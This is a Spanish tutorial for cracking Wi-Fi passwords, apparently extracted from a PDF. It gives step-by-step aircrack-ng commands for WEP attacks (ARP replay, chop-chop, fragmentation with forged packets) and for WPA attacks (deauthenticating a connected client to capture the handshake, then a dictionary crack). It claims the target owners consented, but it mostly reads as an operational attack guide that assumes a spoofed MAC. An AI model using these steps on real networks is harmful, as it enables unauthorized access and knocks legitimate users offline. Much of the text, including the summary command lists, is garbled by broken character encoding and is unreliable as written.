ASALTANDO REDES WI-FI

WEP / WPA
Aetsu
alpha.aetsu@gmail.com
Esta obra se encuentra bajo la licencia Creative Commons 3.0 Es!a"a#
1
Ci$ra%o WEP To%os &os ata'ues
En esta parte del manual explicar de forma simple como auditar una red wifi con cifrado WEP y
obtener su contrasea. Para ello utiliaremos la suite !ircrac"#ng sobre $buntu %.1&'(ubuntu %.1&.
El ata)ue se lanar* sobre +arias redes, todas con el consentimiento de sus propietarios, por esto
omitir el cambio de direccion -!..
Primero +eamos los datos del sistema/
Sistema o!erativo# $buntu %.1& ' (ubuntu %.1&
Tar(eta %e re%# 01i20.0 3045 678&#W5 9chipset atheros:
Nom)re %e inter$a* %e re%# wlan;9despus mon&:
<<<<< =nformaci>n WEP (Wikipedia): http://es.wikipedia.org/wiki/Wired_Equivalent_Privacy
!ntes de empear, por comodidad, recomiendo )ue al abrir una terminal nos autentifi)uemos
como root 9sudo su:, ya )ue todos los comandos )ue introduciremos, o la mayoria, re)uieren )ue
seamos root. $na +e dicho esto empecemos/
+ !brimos una shell y detenemos la interfa )ue +amos a utiliar con/
? ifconfig @interfa de red< down
en mi caso/
? ifconfig wlan; down
, !hora ponemos nuestra targeta en modo monitor/
? airmon#ng start @interfa de red<
en mi caso/
? airmon#ng start wlan;
$na +e hemos hecho esto +emos )ue nuestra targeta pasa a llamarse mon0 y a partir de ahora es
el nombre )ue utiliaremos para referirnos a ella.
;
3 Procedemos a escanear redes con airodump#ng, para ello ponemos/
? airodump#ng @interfa de red<
en mi caso/
? airodump#ng mon&
!hora +amos a intentar entender )ue es cada cosa/
-SSID/ 4a direccion -!. del !P 9el router +ictima:.
PWR/ 4a intensidad de seal )ue recibimos del !P. ! diferencia )ue en wifislax y en otras
distribuciones de seguridad a)uA esta en dbi en lugar de B.
-ea.ons/ Con datos no +alidos para nuestro analisis de la red.
/Data/ !rchi+os de datos +alidos, estos son los )ue nos interesan.
//S/ !)uA +emos a )ue ritmo crecen los ?5ata, es Dtil para +er a )ue +elocidad estamos
inyectando.
C0/ El canal sobre el )ue opera el !P.
1-/ Eelocidad del !P. ## 11 F 6&;.11b '' G7 F 6&;.11g
ENC, CIP0ER, A2T0/ Estos H campos estan relacionados con la encriptaci>n.
ESSID/ El nombre del !P.
3 !brimos una nue+a shell y escogemos un !P/
? airodump#ng #w @archi+o de captura< ##bssid @-!. del !P< #c@canal del !P +ictima<
@interfa de red<
en mi caso/
? airodump#ng #w captura ##bssid aa/bb/cc/dd/ee/ff #cG mon&
H
4 !brimos una nue+a shell y nos asociamos al !P +ictima/
? aireplay#ng #1 1& #e @nombre del !P< #a @-!. del !P< #h @nuestra -!.< @interfa de
red<
en mi caso/
? aireplay#ng #1 1& #e W4!2I7H #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG mon&
ota !/ -ientras no +eamos la carita sonriente #-5 no estamos asociados.
ota "/ El +alor 1& es el tiempo en )ue tarda nuestro pc en comprobar el estado de asociaci>n con el
!P, puede +ariar entre & y H&, y a +eces, este +alor influye en si nos asociamos al !P o no.
Ja tenemos lo b*sico, tenemos nuestra tarjeta de red en modo monitor, la tenemos capturando
pa)uetes y estamos asociados al !P +Actima. ! continuaci>n +eremos los diferentes ata)ues y mas
conocidos )ue podemos realiar con el aircrac"#ng sobre el cifrado WEP.
Ata'ue + 6 3
Este es el ata)ue mas conocido, aun)ue generalmente el mas lento.
7 !brimos una nue+a shell y +amos a intentar reinyectar los ?data/
? aireplay#ng #H #b @-!. del !P< #h @nuestra -!.< @interfa de red<
en nuestro caso/
? aireplay#ng #H #b aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG mon&

7
$na +e hecho esto nos )ueda esperar a )ue empiece el proceso de reinyecci>n, es decir, )ue los
!1P empiecen a subir, cosa )ue puede tardar desde escasos minutos hasta horas.
.uando empiecen a subir +eremos como tambin suben los data de la columna ?5ata de la shell
sobre la )ue esta ejecutandose el airodump#ng, adem*s en la columna ?'C la +elocidad a la )ue se
est*n inyectando los ?data.

$na +e tengamos unos K&.&&& ?data podemos lanar el aircrac"#ng )ue +eremos despus.
Podemos esperar a los K&.&&& ?data, aun)ue hay +eces )ue con menos data 9;&.&&&: ya he
conseguido obtener el pass del !P, por regla general suelen ser alrededor de K&.&&& o mas.
Ata'ue 3 o 8.9o! .9o!:
El ata)ue chop chop no siempre funciona, pero si funciona es m*s r*pido )ue el ata)ue 1LH.
; !brimos una shell y lanamos el ata)ue chop chop/
? aireplay#ng #7 #b @-!. del !P< #h @nuestra -!.< @interfa de red<
)ue en mi caso seria/
? aireplay#ng #7 #b aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG mon&
esperamos a )ue encuentre un pa)uete +*lido y nos preguntar*/
#se this packet$
Entonces contestamos %yes&:
G
!hora esperamos un poco y crear* un nue+o archi+o .cap y un archi+o .'or con lo )ue aparecer*
esto/
< Ejecutamos tcpdump sobre el archi+o .cap/
? tcpdump #s & #n #e #r @archi+o .cap generado antes<
en mi caso/
? tcpdump #s & #n #e #r replayIsrc#11;%#&&7%;;.cap
Menemos )ue prestar atenci>n a la ip )ue aparece en el texto, en mi caso, 1%;.1K6.1.HH, ya )ue la
utiliaremos ahora.
= Norjamos un nue+o pa)uete de datos/
? pac"etforge#ng #& #a @-!. del !P< #h @nuestra -!.< #" @ip dentro del rango< #l @ip
obtenida antes< #y @archi+o .xor obtenido antes< #w @archi+o )ue reinyectaremos<
en mi caso/
? pac"etforge#ng #& #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG #" 1%;.1K6.1.;GG #l
1%;.1K6.1.HH #y replayIdec#11;%#&&7%;;.xor #w arp
K
$na +e ponga
Wrote packet to: (archivo que reinyectare)os*
en mi caso/
Wrote packet to: arp
ya hemos completado este paso.
+0 Por Dltimo reinyectamos el pa)uete creado/
? aireplay#ng #; #h @nuestra -!.< #r @archi+o creado en el paso anterior< @interfa de
red<
en mi caso/
? aireplay#ng #; #h &&/11/;;/HH/77/GG #r arp mon&
y +eremos como los data crecen mas r*pido 9?'C O 1G8:/
!hora igual )ue con el ata)ue 1LH esperamos a tener los ?data necesarios y lanamos el aircrac"#
ng.
8
Ata'ue 4 o 8ata'ue %e $ra(menta.i>n:

Este ata)ue tambin es m*s r*pido )ue el ata)ue 1LH, pero como el ata)ue chop chop no siempre
funciona.
.omo aclaraci>n, para este ata)ue cambi de !P, en este caso W4!2I6!.
++ !brimos una shell y ahora lanamos el ata)ue de fragmentaci>n/
? aireplay#ng #G #b @-!. del !P< #h @nuestra -!.< @interfa de red<
)ue en mi caso seria/
? aireplay#ng #G #b aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG mon&
ahora esperamos a )ue encuentre un pa)uete +*lido y nos preguntar*/
#se this packet$
Entonces contestamos PyesQ/
y aparecer*/
6
$na +e +eamos esto hemos completado este paso.
+, !l igual )ue con el ata)ue Pchop chopQ forjamos un nue+o pa)uete de datos/
? pac"etforge#ng #& #a @-!. del !P< #h @nuestra -!.< #" @ip dentro del rango< #l @ip
obtenida antes< #y @archi+o .xor obtenido antes< #w @archi+o )ue reinyectaremos<
en mi caso/
? pac"etforge#ng #& #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG #" 1%;.1K6.1.;GG #l
1%;.1K6.1.HH #y replayIdec#1;&K#1GGK11.xor #w arp
$na +e ponga
Wrote packet to: (archivo que reinyectare)os*
en mi caso/
Wrote packet to: arp
ya hemos completado este paso.
+3 Para acabar con este ata)ue hace falta reinyectar como con el ata)ue anterior/
? aireplay#ng #; #h @nuestra -!.< #r @archi+o creado en el paso anterior< @interfa de
red<
en mi caso/
? aireplay#ng #; #h &&/11/;;/HH/77/GG #r arp mon&
%


Eemos como los ?data suben a un ritmo mas r*pido )ue con el 1LH. Para finaliar con este ata)ue,
al igual )ue con los anteriores 9!+, y chop chop: falta lanar el aircrac"#ng )ue +eremos ahora.
1&
Air.ra.?-n(
+3 $ltimo paso, desencriptar el archi+o )ue contiene los ?data +alidos, es decir, el )ue esta
capturando desde el principio el airodump#ng. Por tanto abrimos una nue+a shell y/
? aircrac"#ng @archi+o de captura<
en mi caso/
? aircrac"#ng capturaR.cap
!l final aparecer* la ansiada contrasea del !P, sino nos dir* )ue aDn no tenemos suficientes ?data
y tendremos )ue esperar a tener m*s.
.on esto ya est*n los usos mas tApicos de la suite aircrac"#ng, a partir de a)uA nos )ueda jugar con
los comandos de los di+ersos ata)ues, ya )ue ofrecen opciones no comentadas en este tutirial pero
)ue pueden ser Dtilies.

RES21EN WEP
Ata'ue +63#
+5 / i$.on$i( @inter$a* %e re%A %oBn
,5 / airmon-n( start @inter$a* %e re%A
35 / airo%um!-n( @inter$a* %e re%A
35 / airo%um!-n( -B @ar.9ivo %e .a!turaA --)ssi% @1AC %e& APA -.@.ana& %e& AP
vi.timaA @inter$a* %e re%A
45 / aire!&aC-n( -+ +0 -e @nom)re %e& APA -a @1AC %e& APA -9 @nuestra 1ACA
@inter$a* %e re%A
75 / aire!&aC-n( -3 -) @1AC %e& APA -9 @nuestra 1ACA @inter$a* %e re%A
;5 / air.ra.?-n( @ar.9ivo %e .a!turaA
11
Ata'ue .9o! .9o!#
+5 / i$.on$i( @inter$a* %e re%A %oBn
,5 / airmon-n( start @inter$a* %e re%A
35 / airo%um!-n( @inter$a* %e re%A
35 / airo%um!-n( -B @ar.9ivo %e .a!turaA --)ssi% @1AC %e& APA -.@.ana& %e& AP
vi.timaA @inter$a* %e re%A
45 / aire!&aC-n( -+ +0 -e @nom)re %e& APA -a @1AC %e& APA -9 @nuestra 1ACA
@inter$a* %e re%A
75 / aire!&aC-n( -3 -) @1AC %e& APA -9 @nuestra 1ACA @inter$a* %e re%A
;5 / t.!%um! -s 0 -n -e -r @ar.9ivo ..a! (enera%o antesA
<5 / !a.?et$or(e-n( -0 -a @1AC %e& APA -9 @nuestra 1ACA -? @i! %entro %e& ran(oA -&
@i! o)teni%a antesA -C @ar.9ivo .Dor o)teni%o antesA -B @ar.9ivo 'ue reinCe.taremosA
=5 / aire!&aC-n( -, -9 @nuestra 1ACA -r @ar.9ivo .rea%o en e& !aso anteriorA @inter$a*
%e re%A
+05 / air.ra.?-n( @ar.9ivo %e .a!turaA
Ata'ue %e $ra(menta.i>n#
+5 / i$.on$i( @inter$a* %e re%A %oBn
,5 / airmon-n( start @inter$a* %e re%A
35 / airo%um!-n( @inter$a* %e re%A
35 / airo%um!-n( -B @ar.9ivo %e .a!turaA --)ssi% @1AC %e& APA -.@.ana& %e& AP
vi.timaA @inter$a* %e re%A
45 / aire!&aC-n( -+ +0 -e @nom)re %e& APA -a @1AC %e& APA -9 @nuestra 1ACA
@inter$a* %e re%A
75 / aire!&aC-n( -4 -) @1AC %e& APA -9 @nuestra 1ACA @inter$a* %e re%A
;5 / !a.?et$or(e-n( -0 -a @1AC %e& APA -9 @nuestra 1ACA -? @i! %entro %e& ran(oA -&
@i! o)teni%a antesA -C @ar.9ivo .Dor o)teni%o antesA -B @ar.9ivo 'ue reinCe.taremosA
<5 / aire!&aC-n( -, -9 @nuestra 1ACA -r @ar.9ivo .rea%o en e& !aso anteriorA @inter$a*
%e re%A
=5 / air.ra.?-n( @ar.9ivo %e .a!turaA
1;
ASALTANDO REDES WPA CON AIRCRACE-NF
!hora +oy a mostrar como probar la 9in:seguridad de las redes WP!, y para ello utiliare la suite
!ircrac"#ng.
<<<<< =nformaci>n WP- (Wikipedia): http/''es.wi"ipedia.org'wi"i'Wi#NiIProtectedI!ccess
Para empear con esto +amos a mostrar el entorno en el )ue trabajaremos/
-!. del router 9SCC=5:/ aa#))#..#%%#ee#$$
-!. de un cliente asociado al !P/ ++#,,#33#33#44#77
2ombre de la red 9ECC=5:/ vo%a$oneF;EF
.anal del !P/ +,
Cistema operati+o utiliado/ FN2/LinuDGWi$is&aD 3.+5
.hipset de la tarjeta9atacante:/ rt,4;+$
2ombre de la interfa de red/ raus)0
Empearemos este tutorial asumiendo )ue ya tenemos la tarjeta en modo monitor y )ue hemos
tomado las precauciones de cambiar nuestra mac.
Sueno a trabajar/
+ 4o primero )ue tenemos )ue hacer es )us.ar e& AP o)Hetivo con airodump#ng, para ello
abrimos una shell y escribimos/
airodump#ng #w morsa ##bssid aa/bb/cc/dd/ee/ff #c1; rausb&
donde/
airo%um!-n(/ programa para escanear redes wi#fi.
-B morsa/ con -B elegimos el nombre del archi+o de captura, en este caso, )orsa.
--)ssi% aa/bb/cc/dd/ee/ff/ en ##)ssi% ponemos la -!. del !P, en este caso,
aa/bb/cc/dd/ee/ff.
-.1;/ con -. seleccionamos el canal por el )ue opera el !P, en este caso 1;.
raus)0/ nombre con el )ue wifislax reconoce a la tarjeta de red, en este caso, raus)0.
1H
, 4o siguiente sera o)tener e& 9an%s9a?e, para ello o bien esperamos a )ue un cliente se
conecte, o bien desasociamos a un cliente ya conectado al !P, con lo )ue le foraremos a +ol+er a
conectarse y obtendremos el buscado handsha"e.
.omo no )ueremos esperar, +amos a desasociar a alguien conectado a la red, para hacerlo abrimos
una terminal y/

aireplay#ng #& ;& #a aa/bb/cc/dd/ee/ff #c 11/;;/HH/77/GG/KK rausb&
donde/
aire!&aC-n(/ Esta aplicaci>n la utiliaremos para realiar el ata)ue & con el )ue
desasociamos a un cliente asociado al !P +Actima.
-0/ Esto implica )ue utiliamos el ata)ue 0 con el fin de desconectar a un usuario de el !P
objeti+o.
,0/ El numero de pa)uetes )ue mandaremos a la tarjeta asociada con el fin de conseguir )ue
se caiga de la red, en este caso ,0, si ponemos & no parar*n de lanarse pa)uetes hasta )ue
nosotros interrumpamos la ejecuci>n del programa 9.M14 L . en la shell o cerrando la
terminal:.
-a aa/bb/cc/dd/ee/ff/ .on -a seleccionamos la -!. del !P objeti+o.
-. 11/;;/HH/77/GG/KK/ .on -. seleccionamos la -!. de un cliente asociado al !P al )ue
en+iaremos los pa)uetes con el fin de conseguir )ue se reconecte al !P y obtener el
handsha"e.
raus)0/ nombre con el )ue wifislax reconoce a la tarjeta de red, en este caso, raus)0.
3 $na +e el cliente se caiga y se +uel+a a conectar, si hemos obtenido el handsha"e aparecer*
en la parte superior derecha de la +entana del airodump#ng/


17
.omo +emos en la imagen pone WP! handsha"e junto con la mac del !P, en el caso del ejemplo
pondrAa/
WPA 9an%s9a?e# aa/bb/cc/dd/ee/ff
5e todas formas si )ueremos comprobar si hemos obtenido o no el handsha"e, podemos poner en
una shell/
aircrac"#ng morsa#&1.cap
donde/
air.ra.?-n(/ Programa )ue utiliaremos para obtener la contrasea.
morsa-0+..a!/ El archi+o donde hemos guardado la captura de datos.
Entonces si hemos obtenido un handsha"e +alido aparecer*/
3 Sueno para acabar esto solo tenemos )ue tener, 12C0ISI1A S2ERTE, para )ue la cla+e
del !P este en nuestro diccionario. Para este ejemplo, utiliare el diccionario )ue se encuentra en
$buntu 9supongo )ue otras distros tambin lo tendr*n, pero no lo he comprobado: aadindole mi
cla+e por la mitad ya )ue no aparecAa en este.
Para encontrarlo en $buntu hay )ue ir a/
/et./%i.tionaries-.ommon
y dentro de esta carpeta encontraremos un archi+o llamado Bor%s.
$na +e escogido nuestro diccionario solo )ueda lanar el ata)ue. Este ata)ue durar* mas o menos
en funci>n del tamao del diccionario.
aircrac"#ng #w 'root'5es"top'words morsa#&1.cap
donde/
air.ra.?-n(/ Programa )ue utiliaremos para obtener la contrasea.
-B 'root'5es"top'words/ .on -B seleccionamos el diccionario )ue utiliaremos, en mi caso
se encuentra en el directorio 'root'5es"top y se llama words.
morsa-0+..a!/ El archi+o donde hemos guardado la captura de datos.
1G
$na +e iniciado el proceso de crac"eo de la contrasea solo nos )ueda esperar y tener suerte de
)ue la contrasea del !P se encuentre en nuestro diccionario como hemos dicho antes.
En mi caso la cla+e era IE2ECIRE0C-NJK y tard> un par de minutos en encontrarla.
.on esto acabo este tutorial sobre como obtener la contrasea de !P con este cifrado, resaltando
)ue lo mas importante hoy por hoy, para obtener el acceso a una red wi#fi protegida con WP!, es
)ue la contrasea este en uno de nuestros diccionarios, sino no podremos acceder a esta y el trabajo
habr* sido en +ano.
$n saludo.

1K
RES21EN WPA
Ata'ue a re%es WPA#
+5 / airo%um!-n( -B @ar.9ivo %e .a!turaA --)ssi% @1AC %e& APA -.@.ana& %e& AP
vi.timaA @inter$a* %e re%A
,5 / aire!&aC-n( -0 ,0 -a @1AC %e& APA -. @1AC tarHeta aso.ia%a a& APA @inter$a* %e
re%A
35 / air.ra.?-n( -B @%i..ionarioA @ar.9ivo %e .a!turaA
REFERENCIAS#
Suite Air.ra.?-n(# http/''www.aircrac"#ng.org'
ESCRITO PARA#
Arte0a.?# http/''artehac".net'
CP0# http/''foro.portalhac"er.net'

by Aetsu
alpha.aetsu@gmail.com
Esta obra se encuentra bajo la licencia Creative Commons 3.0 - Es!a"a
18